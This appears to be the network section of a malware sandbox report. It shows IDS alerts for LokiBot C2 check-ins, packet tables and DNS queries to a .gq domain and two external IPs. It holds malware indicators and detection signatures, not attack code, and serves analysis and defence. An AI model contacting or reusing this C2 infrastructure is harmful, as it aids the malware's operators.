                      10/14/21-08:30:01.416467TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992780192.168.2.6104.21.62.32
                      10/14/21-08:30:02.546683TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992880192.168.2.6104.21.62.32
                      10/14/21-08:30:02.546683TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992880192.168.2.6104.21.62.32
                      10/14/21-08:30:02.546683TCP2025381ET TROJAN LokiBot Checkin4992880192.168.2.6104.21.62.32
                      10/14/21-08:30:02.546683TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992880192.168.2.6104.21.62.32
                      10/14/21-08:30:03.716523TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992980192.168.2.6172.67.219.104
                      10/14/21-08:30:03.716523TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992980192.168.2.6172.67.219.104
                      10/14/21-08:30:03.716523TCP2025381ET TROJAN LokiBot Checkin4992980192.168.2.6172.67.219.104
                      10/14/21-08:30:03.716523TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992980192.168.2.6172.67.219.104
                      10/14/21-08:30:04.877321TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993080192.168.2.6172.67.219.104
                      10/14/21-08:30:04.877321TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993080192.168.2.6172.67.219.104
                      10/14/21-08:30:04.877321TCP2025381ET TROJAN LokiBot Checkin4993080192.168.2.6172.67.219.104
                      10/14/21-08:30:04.877321TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993080192.168.2.6172.67.219.104
                      10/14/21-08:30:05.956296TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993180192.168.2.6172.67.219.104
                      10/14/21-08:30:05.956296TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993180192.168.2.6172.67.219.104
                      10/14/21-08:30:05.956296TCP2025381ET TROJAN LokiBot Checkin4993180192.168.2.6172.67.219.104
                      10/14/21-08:30:05.956296TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993180192.168.2.6172.67.219.104
                      10/14/21-08:30:07.140644TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993280192.168.2.6172.67.219.104
                      10/14/21-08:30:07.140644TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993280192.168.2.6172.67.219.104
                      10/14/21-08:30:07.140644TCP2025381ET TROJAN LokiBot Checkin4993280192.168.2.6172.67.219.104
                      10/14/21-08:30:07.140644TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993280192.168.2.6172.67.219.104
                      10/14/21-08:30:08.437281TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993380192.168.2.6104.21.62.32
                      10/14/21-08:30:08.437281TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993380192.168.2.6104.21.62.32
                      10/14/21-08:30:08.437281TCP2025381ET TROJAN LokiBot Checkin4993380192.168.2.6104.21.62.32
                      10/14/21-08:30:08.437281TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993380192.168.2.6104.21.62.32
                      10/14/21-08:30:09.692348TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993480192.168.2.6172.67.219.104
                      10/14/21-08:30:09.692348TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993480192.168.2.6172.67.219.104
                      10/14/21-08:30:09.692348TCP2025381ET TROJAN LokiBot Checkin4993480192.168.2.6172.67.219.104
                      10/14/21-08:30:09.692348TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993480192.168.2.6172.67.219.104
                      10/14/21-08:30:11.132684TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993580192.168.2.6104.21.62.32
                      10/14/21-08:30:11.132684TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993580192.168.2.6104.21.62.32
                      10/14/21-08:30:11.132684TCP2025381ET TROJAN LokiBot Checkin4993580192.168.2.6104.21.62.32
                      10/14/21-08:30:11.132684TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993580192.168.2.6104.21.62.32
                      10/14/21-08:30:13.066124TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993680192.168.2.6172.67.219.104
                      10/14/21-08:30:13.066124TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993680192.168.2.6172.67.219.104
                      10/14/21-08:30:13.066124TCP2025381ET TROJAN LokiBot Checkin4993680192.168.2.6172.67.219.104
                      10/14/21-08:30:13.066124TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993680192.168.2.6172.67.219.104
                      10/14/21-08:30:15.336416TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993780192.168.2.6104.21.62.32
                      10/14/21-08:30:15.336416TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993780192.168.2.6104.21.62.32
                      10/14/21-08:30:15.336416TCP2025381ET TROJAN LokiBot Checkin4993780192.168.2.6104.21.62.32
                      10/14/21-08:30:15.336416TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993780192.168.2.6104.21.62.32
                      10/14/21-08:30:16.682402TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993880192.168.2.6172.67.219.104
                      10/14/21-08:30:16.682402TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993880192.168.2.6172.67.219.104
                      10/14/21-08:30:16.682402TCP2025381ET TROJAN LokiBot Checkin4993880192.168.2.6172.67.219.104
                      10/14/21-08:30:16.682402TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993880192.168.2.6172.67.219.104
                      10/14/21-08:30:18.312437TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993980192.168.2.6172.67.219.104
                      10/14/21-08:30:18.312437TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993980192.168.2.6172.67.219.104
                      10/14/21-08:30:18.312437TCP2025381ET TROJAN LokiBot Checkin4993980192.168.2.6172.67.219.104
                      10/14/21-08:30:18.312437TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993980192.168.2.6172.67.219.104

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Oct 14, 2021 08:28:19.027772903 CEST4977980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:19.043910027 CEST8049779172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:19.044029951 CEST4977980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:19.047157049 CEST4977980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:19.063246012 CEST8049779172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:19.063373089 CEST4977980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:19.079444885 CEST8049779172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:19.209945917 CEST8049779172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:19.210149050 CEST4977980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:19.214078903 CEST8049779172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:19.214210033 CEST4977980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:19.226104975 CEST8049779172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:20.327538013 CEST4978080192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:20.343683004 CEST8049780172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:20.343846083 CEST4978080192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:20.347126961 CEST4978080192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:20.363301039 CEST8049780172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:20.363467932 CEST4978080192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:20.379602909 CEST8049780172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:20.460792065 CEST8049780172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:20.461388111 CEST4978080192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:20.463710070 CEST8049780172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:20.463839054 CEST4978080192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:20.477552891 CEST8049780172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:21.319694996 CEST4978180192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:21.335665941 CEST8049781104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:21.335860968 CEST4978180192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:21.339482069 CEST4978180192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:21.355335951 CEST8049781104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:21.355484962 CEST4978180192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:21.371328115 CEST8049781104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:21.535239935 CEST8049781104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:21.535434008 CEST4978180192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:21.539542913 CEST8049781104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:21.539675951 CEST4978180192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:21.551295042 CEST8049781104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:22.573314905 CEST4978280192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:22.589943886 CEST8049782104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:22.590146065 CEST4978280192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:22.592927933 CEST4978280192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:22.609252930 CEST8049782104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:22.609401941 CEST4978280192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:22.625505924 CEST8049782104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:22.751913071 CEST8049782104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:22.752219915 CEST4978280192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:22.755004883 CEST8049782104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:22.755127907 CEST4978280192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:22.769331932 CEST8049782104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:23.772778034 CEST4978380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:23.789092064 CEST8049783172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:23.789271116 CEST4978380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:23.792481899 CEST4978380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:23.808448076 CEST8049783172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:23.808618069 CEST4978380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:23.826692104 CEST8049783172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:23.945936918 CEST8049783172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:23.946243048 CEST4978380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:23.950661898 CEST8049783172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:23.950746059 CEST4978380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:23.962250948 CEST8049783172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:24.866316080 CEST4978480192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:24.882256985 CEST8049784172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:24.882406950 CEST4978480192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:24.885116100 CEST4978480192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:24.901065111 CEST8049784172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:24.901196003 CEST4978480192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:24.917064905 CEST8049784172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:25.039886951 CEST8049784172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:25.040055990 CEST4978480192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:25.044074059 CEST8049784172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:25.044162989 CEST4978480192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:25.055864096 CEST8049784172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:26.004973888 CEST4978580192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:26.021157980 CEST8049785104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:26.021306992 CEST4978580192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:26.025161982 CEST4978580192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:26.041219950 CEST8049785104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:26.041390896 CEST4978580192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:26.057322979 CEST8049785104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:26.179322958 CEST8049785104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:26.184068918 CEST8049785104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:26.184221983 CEST4978580192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:26.233534098 CEST4978580192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:26.249512911 CEST8049785104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:27.318810940 CEST4978680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:27.334852934 CEST8049786172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:27.337574005 CEST4978680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:27.340971947 CEST4978680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:27.356816053 CEST8049786172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:27.357132912 CEST4978680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:27.372992039 CEST8049786172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:27.495248079 CEST8049786172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:27.495812893 CEST4978680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:27.502477884 CEST8049786172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:27.502729893 CEST4978680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:27.511775017 CEST8049786172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:30.268244028 CEST4978780192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:30.285348892 CEST8049787172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:30.285460949 CEST4978780192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:30.289741993 CEST4978780192.168.2.6172.67.219.104

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Oct 14, 2021 08:28:18.981506109 CEST6034253192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:19.010951996 CEST53603428.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:20.304617882 CEST6134653192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:20.325933933 CEST53613468.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:21.290359974 CEST5177453192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:21.317846060 CEST53517748.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:22.530085087 CEST5602353192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:22.570988894 CEST53560238.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:23.741621971 CEST5838453192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:23.760160923 CEST53583848.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:24.836807966 CEST6026153192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:24.865097046 CEST53602618.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:25.974273920 CEST5606153192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:26.003031015 CEST53560618.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:27.298286915 CEST5833653192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:27.316716909 CEST53583368.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:30.236521959 CEST5378153192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:30.266340971 CEST53537818.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:31.345115900 CEST5406453192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:31.363276005 CEST53540648.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:32.470803976 CEST5281153192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:32.486987114 CEST53528118.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:33.632031918 CEST5529953192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:33.648431063 CEST53552998.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:34.851088047 CEST6374553192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:34.869492054 CEST53637458.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:35.953857899 CEST5005553192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:35.970498085 CEST53500558.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:37.063189983 CEST6137453192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:37.092448950 CEST53613748.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:38.346430063 CEST5033953192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:38.365737915 CEST53503398.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:39.473190069 CEST6330753192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:39.491631031 CEST53633078.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:41.046897888 CEST5498253192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:41.065442085 CEST53549828.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:42.234715939 CEST5001053192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:42.252979994 CEST53500108.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:43.827435970 CEST6371853192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:43.845922947 CEST53637188.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:45.159775019 CEST6211653192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:45.178029060 CEST53621168.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:48.000888109 CEST6381653192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:48.019318104 CEST53638168.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:49.619648933 CEST5501453192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:49.638375998 CEST53550148.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:50.931046009 CEST6220853192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:50.949512959 CEST53622088.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:52.281750917 CEST5757453192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:52.300395012 CEST53575748.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:53.526912928 CEST5181853192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:53.543016911 CEST53518188.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:54.606945038 CEST5662853192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:54.625006914 CEST53566288.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:56.038455963 CEST6077853192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:56.054569006 CEST53607788.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:57.478297949 CEST5468353192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:57.496562958 CEST53546838.8.8.8192.168.2.6
                      Oct 14, 2021 08:28:58.838350058 CEST5932953192.168.2.68.8.8.8
                      Oct 14, 2021 08:28:58.857067108 CEST53593298.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:00.261539936 CEST6402153192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:00.278069973 CEST53640218.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:01.621984959 CEST5612953192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:01.640744925 CEST53561298.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:03.038508892 CEST5817753192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:03.056396961 CEST53581778.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:06.114991903 CEST5070053192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:06.133622885 CEST53507008.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:07.492008924 CEST5406953192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:07.510478020 CEST53540698.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:08.682867050 CEST6117853192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:08.701395035 CEST53611788.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:09.870501995 CEST5024353192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:09.889010906 CEST53502438.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:11.079993010 CEST5506653192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:11.098392010 CEST53550668.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:12.308362961 CEST5845453192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:12.326812029 CEST53584548.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:13.616075993 CEST5769153192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:13.634321928 CEST53576918.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:15.094715118 CEST5948953192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:15.112957954 CEST53594898.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:16.619941950 CEST6402253192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:16.638273001 CEST53640228.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:17.969158888 CEST6002353192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:17.987740993 CEST53600238.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:20.357798100 CEST5719353192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:20.374650002 CEST53571938.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:21.776597023 CEST6441353192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:21.795156002 CEST53644138.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:23.380697966 CEST6042953192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:23.396900892 CEST53604298.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:27.428143978 CEST6034553192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:27.445975065 CEST53603458.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:29.608062983 CEST5873053192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:29.624861002 CEST53587308.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:31.696376085 CEST5383053192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:31.713087082 CEST53538308.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:32.966362000 CEST5722653192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:32.984905005 CEST53572268.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:35.225338936 CEST5788053192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:35.243751049 CEST53578808.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:36.929517031 CEST6085053192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:36.947783947 CEST53608508.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:38.099759102 CEST5583053192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:38.117574930 CEST53558308.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:39.331229925 CEST5514553192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:39.349596024 CEST53551458.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:40.663470984 CEST6409153192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:40.681256056 CEST53640918.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:41.832782984 CEST5572853192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:41.851002932 CEST53557288.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:43.238637924 CEST5569453192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:43.256962061 CEST53556948.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:44.388569117 CEST5392653192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:44.406697989 CEST53539268.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:45.724782944 CEST6553153192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:45.741152048 CEST53655318.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:46.881611109 CEST6543753192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:46.900079012 CEST53654378.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:48.011307001 CEST5459053192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:48.029814005 CEST53545908.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:49.280458927 CEST5131853192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:49.299062967 CEST53513188.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:51.840734005 CEST5847453192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:51.858999968 CEST53584748.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:55.796895981 CEST5909253192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:55.815201998 CEST53590928.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:56.924676895 CEST5748353192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:56.942806959 CEST53574838.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:58.030971050 CEST5383053192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:58.047533989 CEST53538308.8.8.8192.168.2.6
                      Oct 14, 2021 08:29:59.187026978 CEST4980953192.168.2.68.8.8.8
                      Oct 14, 2021 08:29:59.205523968 CEST53498098.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:00.267366886 CEST5281453192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:00.285648108 CEST53528148.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:01.374663115 CEST5106953192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:01.393187046 CEST53510698.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:02.507575035 CEST5652653192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:02.525789976 CEST53565268.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:03.656306028 CEST5051253192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:03.674351931 CEST53505128.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:04.837879896 CEST5167953192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:04.856111050 CEST53516798.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:05.918864965 CEST5607153192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:05.935167074 CEST53560718.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:07.100869894 CEST5895053192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:07.119254112 CEST53589508.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:08.397211075 CEST5703553192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:08.415246964 CEST53570358.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:09.653837919 CEST5412253192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:09.670599937 CEST53541228.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:11.092576981 CEST5675953192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:11.109034061 CEST53567598.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:12.873286009 CEST5922053192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:12.891690969 CEST53592208.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:15.296228886 CEST6221153192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:15.314672947 CEST53622118.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:16.637487888 CEST6203353192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:16.658160925 CEST53620338.8.8.8192.168.2.6
                      Oct 14, 2021 08:30:18.273524046 CEST6124453192.168.2.68.8.8.8
                      Oct 14, 2021 08:30:18.291595936 CEST53612448.8.8.8192.168.2.6

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                      Oct 14, 2021 08:28:18.981506109 CEST192.168.2.68.8.8.80x9641Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:20.304617882 CEST192.168.2.68.8.8.80xcfd3Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:21.290359974 CEST192.168.2.68.8.8.80x66b6Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:22.530085087 CEST192.168.2.68.8.8.80x7b38Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:23.741621971 CEST192.168.2.68.8.8.80x65d8Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:24.836807966 CEST192.168.2.68.8.8.80xc6baStandard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
                      Oct 14, 2021 08:28:25.974273920 CEST192.168.2.68.8.8.80xa520Standard query (0)74f26d34ffff049368a6cff8812f86ee.gqA (IP address)IN (0x0001)
